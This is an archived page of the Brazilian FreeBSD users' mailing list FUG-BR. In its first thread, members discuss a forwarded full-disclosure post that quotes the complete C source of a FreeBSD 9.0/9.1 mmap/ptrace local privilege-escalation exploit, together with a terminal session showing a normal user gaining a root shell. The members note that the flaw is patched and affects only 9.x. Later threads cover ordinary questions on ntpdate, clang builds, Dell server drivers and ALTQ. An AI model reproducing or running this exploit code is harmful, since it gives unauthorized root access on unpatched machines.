Re: [FUG-BR] Fwd: Happy Birthday FreeBSD! Now you are 20 years old and your security is the same as 20 years ago... :)
Em 24/06/13 18:44, firebits escreveu:
> Marcelo Gondim, cita para nós qual é a lista de security, que fez essa
> afirmação, fiquei curioso...rss
>
> @firebitsbr
Emiel Kollof que mandou pra bugt...@securityfocus.com:)
>
>
> Em 20 de junho de 2013 17:38, Marcelo Gondim escreveu:
>
>> Em 20/06/13 15:42, Evandro Nunes escreveu:
>>> On Thu, Jun 20, 2013 at 9:29 AM, Marcelo Gondim >> wrote:
>>>
É pessoal,
Sei que a vulnerabilidade foi corrigida agora mas foram 20 anos para
detectar isso? :(
E funciona lindo mesmo o programa.
>>> de onde saiu isso que tem 20 anos? pelo pouco que deu pra ler explora uma
>>> falha do freebsd 9 inclusive o security adv so explora o freebsd 9
>>> alguem teve sucesso com freebsd 8, 7, outro?
>>> acho que a frase "seguranca de 20 anos atras" foi apenas ironiazinha
>>> pelo que vi esse vulnerabilidade nao afeta quem tem debug de processo nao
>>> root nem quem tem mac_partition ou bsdextended implementado
>>>
>>> nego quer é aparecer rss rsss a falha tai, mas não teve 0day inclusive o
>>> "ultra mega hacker expert" só fez o exploit depois que o advisory foi
>>> publicado, e ainda levou 2 dias pra conseguir explorar o que ja estava
>>> documentado e corrigido e vem tirar uma onda de full disclosure...
>> Pois é recebi isso em uma lista de segurança que assino. Consegui um 8.4
>> e testei e não rola. Só no 9 mesmo.
>> Esses caras são uns paiaços mesmo rsrsrsrsrs
>>
>>>
Mensagem original
Assunto:Happy Birthday FreeBSD! Now you are 20 years old and
>> your
security is the same as 20 years ago... :)
Data: Wed, 19 Jun 2013 23:32:59 +0200
De: Hunger
Para: full-disclos...@lists.grok.org.uk
$ uname -a
FreeBSD fbsd91x64 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r243825: Tue Dec
4 09:23:10 UTC 2012
r...@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(hunger) gid=1002(hunger) groups=1002(hunger)
$ gcc fbsd9lul.c -o fbsd9lul
$ ./fbsd9lul
FreeBSD 9.{0,1} mmap/ptrace exploit
by Hunger
# id
uid=0(root) gid=0(wheel) egid=1002(hunger) groups=1002(hunger)
#
code =
/*
* FreeBSD 9.{0,1} mmap/ptrace exploit
* by Hunger
*
* Happy Birthday FreeBSD!
* Now you are 20 years old and your security is the same as 20 years
ago...
*
* Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op,
>> pipacs,
prof,
* sd, sghctoma, snq, spender, s2crew and others at
#hekkcamp:
* I hope we'll meet again at 8@1470n
*
* Special thanks to proactivesec.com
*
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SH "/bin/sh"
#define TG "/usr/sbin/timedc"
int
main(int ac, char **av) {
int from_fd, to_fd, status;
struct stat st;
struct ptrace_io_desc piod;
char *s, *d;
pid_t pid;
if (geteuid() == 0) {
setuid(0);
execl(SH, SH, NULL);
return 0;
}
printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
printf("by Hunger\n");
if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
(to_fd = open(TG, O_RDONLY)) == -1)
err(1, "open");
if (stat(av[0], &st) == -1)
err(2, "stat");
if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
(d = mmap(NULL, (size_t)st.st_size, PROT_READ,
MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) ==
MAP_FAILED)
err(3, "mmap");
if ((pid = fork()) == -1)
err(4, "fork");
if (!pid) {
if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
err(5, "ptraceme");
return 0;
}
if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
err(6, "ptattach");
if (wait(&status) == -1)
err(7, "wait");
piod.piod_op = PIOD_WRITE_D;
piod.piod_offs = d;
piod.piod_addr = s;
piod.piod_len = st.st_size;
if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
err(8, "ptio");
execl(TG, TG, NULL);
return 0;
}
-
Histórico: http://www.fug.com.br/historico/html/freebsd/
Sair da lista: https://www.fug.com.br/mailman/lis
[FUG-BR] NTP
Senhores, Estou utilizando o ntpdate em um 8.4-STABLE e me deparei com uma situação muito estranha, o servidor consulta o ntp e mostra o sincronimos porém não aplica a mesma no sistema. a conf está da seguinte forma: rc.conf ntpdate_enable="YES" ntpdate_flags="-b -u -4" ntpdate_hosts="a.ntp.br ntp.cais.rnp.br" No boot da máquina, como eu falei, ele sincroniza corretamente, porém não aplica. Depois de logar com o root e rodar o ntpdate a.ntp.br ele simplesmente sincroniza. obrigado, - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] NTP
Coloca no cron: service ntpdate restart no horário que você achar conveniente, utilizo isso para sincronização sem a necessidade de rodar mais um deamon que poderia ser explorado em uma falha de segurança futura. Isso é válido onde o horário não é crítico. Paulo. Em 25/06/13 10:24, Márcio Luciano Donada escreveu: > Senhores, > Estou utilizando o ntpdate em um 8.4-STABLE e me deparei com uma situação > muito estranha, o servidor consulta o ntp e mostra o sincronimos porém não > aplica a mesma no sistema. a conf está da seguinte forma: > > rc.conf > ntpdate_enable="YES" > ntpdate_flags="-b -u -4" > ntpdate_hosts="a.ntp.br ntp.cais.rnp.br" > > No boot da máquina, como eu falei, ele sincroniza corretamente, porém não > aplica. Depois de logar com o root e rodar o ntpdate a.ntp.br ele > simplesmente sincroniza. > > obrigado, > - > Histórico: http://www.fug.com.br/historico/html/freebsd/ > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] NTP
Em 25 de junho de 2013 10:33, Paulo Fragoso escreveu: > Coloca no cron: > > service ntpdate restart > > no horário que você achar conveniente, utilizo isso para sincronização > sem a necessidade de rodar mais um deamon que poderia ser explorado em > uma falha de segurança futura. > > Isso é válido onde o horário não é crítico. > > Paulo. > > Em 25/06/13 10:24, Márcio Luciano Donada escreveu: >> Senhores, >> Estou utilizando o ntpdate em um 8.4-STABLE e me deparei com uma situação >> muito estranha, o servidor consulta o ntp e mostra o sincronimos porém não >> aplica a mesma no sistema. a conf está da seguinte forma: >> >> rc.conf >> ntpdate_enable="YES" >> ntpdate_flags="-b -u -4" >> ntpdate_hosts="a.ntp.br ntp.cais.rnp.br" >> >> No boot da máquina, como eu falei, ele sincroniza corretamente, porém não >> aplica. Depois de logar com o root e rodar o ntpdate a.ntp.br ele >> simplesmente sincroniza. >> >> obrigado, >> - >> Histórico: http://www.fug.com.br/historico/html/freebsd/ >> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd > > - > Histórico: http://www.fug.com.br/historico/html/freebsd/ > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd pelo que me lembro, service ntpdate restart esta comando do linux. sptizer# cat /etc/rc.conf | grep ntp ntpd_enable="YES" sptizer# /etc/rc.d/ntpd restart Stopping ntpd. Starting ntpd. -- Alessandro de Souza Rocha Administrador de Redes e Sistemas FreeBSD-BR User #117 Long live FreeBSD Powered by (__) \\\'',) \/ \ ^ .\._/_) www.FreeBSD.org - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] [Off-Topic] - Compatibilidade do Freebsd em Servidores Dell PowerEdge
Ola lista ! O pessoal da lista tem usado o FreeBSD sem grandes problemas em servidores Dell PowerEdge ? Estou enfrentando alguns problemas com um R720, a controladora de rede BCM5720 insiste em dar "watchdog timeout -- resetting error", estou usando o FreeBSD 9.1, compilei alguns drivers do fabricante para Freebsd, mas ainda sem efeito :-(. Estou tentando recompilar o kernel para a versão stable e ver se o problema some, não estou com muita esperança que isso resolva ... Uma outra duvida, alguém usa HBA QLogic 2560 no FreeBSD 9.1 ? Agradeço se alguém tiver dicas ! Eder - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] [OFF-TOPIC]Como ter garantia de ser respondido sobre dúvidas de BSD?
também estou precisando de dinheiro, ficarei feliz em te cobrar, pois já não é a primeira vez que você faz essa pergunta... "pra quem devo pagar, etc e tal..." Em 23 de junho de 2013 18:38, Renato Botelho escreveu: > On 06/22/2013 11:38 AM, Jorge Luis Carvalho Santos wrote: > > Eric Raimond diz no guia Como fazer perguntas inteligentes, no título > Antes de perguntar, "Nunca assuma que você merece uma resposta. Você não > merece; você não está, afinal de contas, pagando por este serviço. Você irá > ganhar uma resposta, se ganhar, fazendo perguntas substanciais, > interessantes e intrigantes - uma que contribua com a experiência da > comunidade ao invés de apenas extrair conhecimentos dos outros." > > Se o usuário não ganhar a resposta ou se as comunidades de BSD, por > exemplo, a lista e o fórum FUG-BR estiverem paradas, a quem se deve pagar > para ter garantia de ser respondido sobre dúvida de BSD? > > Para mim será frustrante fazer o FreeBSD Server e System Administration > da FreeBSD Brasil se depois de fazer esse curso não ganhar resposta de > comunidade BSD ou se as comunidades de BSD estiverem paradas, pois não sei > inglês para ser ajudado pela freebsd.org. > > Pague pra mim e eu te respondo. > > -- > Renato Botelho > - > Histórico: http://www.fug.com.br/historico/html/freebsd/ > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd > -- Att. Tiago N. Furbeta Cangere Online Provedor de Internet Ltda. Empresa de Telecomunicações Autorizada SCM/ANATEL tfurb...@cangere.com.br - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Orbis OS
Já rolou por aqui? Bem, não chequei no histórico, pois mesmo que tenha rolado acho que merece repeteco! http://br-linux.org/2013/01/orbis-os-o-sistema-operacional-do-playstation-4-e-mesmo-um-derivado-do-freebsd.html Carlos E G Carvalho (Cartola) http://cartola.org/360 http://www.panoforum.com.br/ - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Intel ixgbe + ALTQ
Pessoal, No HEAD já é possível usar ALTQ novamente com as placas ixgbe. E de quebra a Intel representada pelo desenvolvedor jfv@, sincronizou o código na Intel com o da base do FreeBSD, agora temos a última versão com quase as mesmas funções que em outros sistemas operacionais. Tenho apenas que dizer, o jfv@ é foda Ref: http://svnweb.freebsd.org/base?view=revision&revision=251964 Abraços. -- Marcelo Araujo ara...@freebsd.org - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
[FUG-BR] Local correto para selecionar o compilador
Olá pessoal, Estou com dois problemas, que andei procurando pelo handbook e pela net e não achei uma solução que me convença. Quero apenas utilizar para a compilação do meus sistema (FONTES/KERNEL) o compilador clang. Fui até o make.conf e puz o seguinte: WITHOUT_GCC="YES" CC=clang mas não funcionou, ele ainda chama o gcc para compilar. Existe uma outra opção ou no 9.1 não posso utilizar apenas o clang? uma outra coisa é que estou tento problemas para compilar os fontes como segue: llvm/lib/Support/system_error.cpp c++ -O2 -pipe - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/include - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/tools/clang/include - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support -I. - I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/../../lib/clang/inclu de -DLLVM_ON_UNIX -DLLVM_ON_FREEBSD -D__STDC_LIMIT_MACROS - D__STDC_CONSTANT_MACROS -fno-strict-aliasing - DLLVM_DEFAULT_TARGET_TRIPLE=\"x86_64-unknown-freebsd9.1\" - DLLVM_HOSTTRIPLE=\"x86_64-unknown-freebsd9.1\" -DDEFAULT_SYSROOT=\"\" - I/usr/obj/usr/src/tmp/legacy/usr/include -fno-exceptions -fno-rtti -c /usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support/APFloat.cp p -o APFloat.o /usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support/APFloat.cp p:1: internal compiler error: Segmentation fault: 11 Please submit a full bug report, with preprocessed source if appropriate. See http://gcc.gnu.org/bugs.html> for instructions. *** [APFloat.o] Error code 1 Stop in /usr/src/lib/clang/libllvmsupport. *** [bootstrap-tools] Error code 1 Stop in /usr/src. *** [_bootstrap-tools] Error code 1 e é sempre nesse arquivo. Já eixei meu computador 24horas rodando o memtest86 e nada de anormal. O mais extranho é que no meu laptop e em mais dois outros roda redondo. Segue infos do meu sistema: FreeBSD valfenda 9.1-STABLE FreeBSD 9.1-STABLE #3 r251021: Mon May 27 05:29:03 BRT 2013 rizzo@valfenda:/usr/obj/usr/cvsup/src/sys/VALFENDA amd64 CPU: AMD Athlon(tm) 64 X2 Dual Core Processor 4400+ (2300.14-MHz K8-class CPU) FreeBSD/SMP: Multiprocessor System Detected: 2 CPUs cpu0: on acpi0 cpu1: on acpi0 amdtemp0: on hostb4 acpi_throttle0: on cpu0 SMP: AP CPU #1 Launched! real memory = 4294967296 (4096 MB) avail memory = 3973017600 (3788 MB) - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Re: [FUG-BR] Local correto para selecionar o compilador
* Nilton Jose Rizzo (ri...@i805.com.br) wrote: > > > Olá pessoal, > > > Estou com dois problemas, que andei procurando pelo handbook e pela > net e não achei uma solução que me convença. > > > Quero apenas utilizar para a compilação do meus sistema (FONTES/KERNEL) > o compilador clang. Fui até o make.conf e puz o seguinte: > > WITHOUT_GCC="YES" > CC=clang > > > mas não funcionou, ele ainda chama o gcc para compilar. > > Existe uma outra opção ou no 9.1 não posso utilizar apenas o clang? > > > uma outra coisa é que estou tento problemas para compilar os fontes > como segue: > > llvm/lib/Support/system_error.cpp > > c++ -O2 -pipe - > I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/include - > I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/tools/clang/include - > I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support -I. - > I/usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/../../lib/clang/inclu > de -DLLVM_ON_UNIX -DLLVM_ON_FREEBSD -D__STDC_LIMIT_MACROS - > D__STDC_CONSTANT_MACROS -fno-strict-aliasing - > DLLVM_DEFAULT_TARGET_TRIPLE=\"x86_64-unknown-freebsd9.1\" - > DLLVM_HOSTTRIPLE=\"x86_64-unknown-freebsd9.1\" -DDEFAULT_SYSROOT=\"\" - > I/usr/obj/usr/src/tmp/legacy/usr/include -fno-exceptions -fno-rtti -c > /usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support/APFloat.cp > p -o APFloat.o > /usr/src/lib/clang/libllvmsupport/../../../contrib/llvm/lib/Support/APFloat.cp > p:1: internal compiler error: Segmentation fault: 11 > Please submit a full bug report, > with preprocessed source if appropriate. > See http://gcc.gnu.org/bugs.html> for instructions. > *** [APFloat.o] Error code 1 > > Stop in /usr/src/lib/clang/libllvmsupport. > *** [bootstrap-tools] Error code 1 > > Stop in /usr/src. > *** [_bootstrap-tools] Error code 1 > > e é sempre nesse arquivo. Já eixei meu computador 24horas rodando o > memtest86 e nada de anormal. O mais extranho é que no meu laptop > e em mais dois outros roda redondo. > > Segue infos do meu sistema: > > FreeBSD valfenda 9.1-STABLE FreeBSD 9.1-STABLE #3 r251021: Mon May 27 > 05:29:03 > BRT 2013 rizzo@valfenda:/usr/obj/usr/cvsup/src/sys/VALFENDA amd64 > > CPU: AMD Athlon(tm) 64 X2 Dual Core Processor 4400+ (2300.14-MHz K8-class CPU) > FreeBSD/SMP: Multiprocessor System Detected: 2 CPUs > cpu0: on acpi0 > cpu1: on acpi0 > amdtemp0: on hostb4 > acpi_throttle0: on cpu0 > SMP: AP CPU #1 Launched! > > > real memory = 4294967296 (4096 MB) > avail memory = 3973017600 (3788 MB) > > > Você esta tentando compilar o clang ? no 9.x ele já vem nativo (/usr/bin/clang) para compilar ports e world com clang, coloque no /etc/make.conf: CC=clang CXX=clang++ CPP=clang-cpp Segue algumas referencias: https://wiki.freebsd.org/BuildingFreeBSDWithClang https://wiki.freebsd.org/PortsAndClang Abraços --- Luiz Gustavo Costa (Powered by BSD) *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+ mundoUnix - Consultoria em Software Livre http://www.mundounix.com.br ICQ: 2890831 / MSN: cont...@mundounix.com.br Tel: 55 (21) 4063-7110 / 8194-1905 / (11) 4063-0407 Blog: http://www.luizgustavo.pro.br - Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
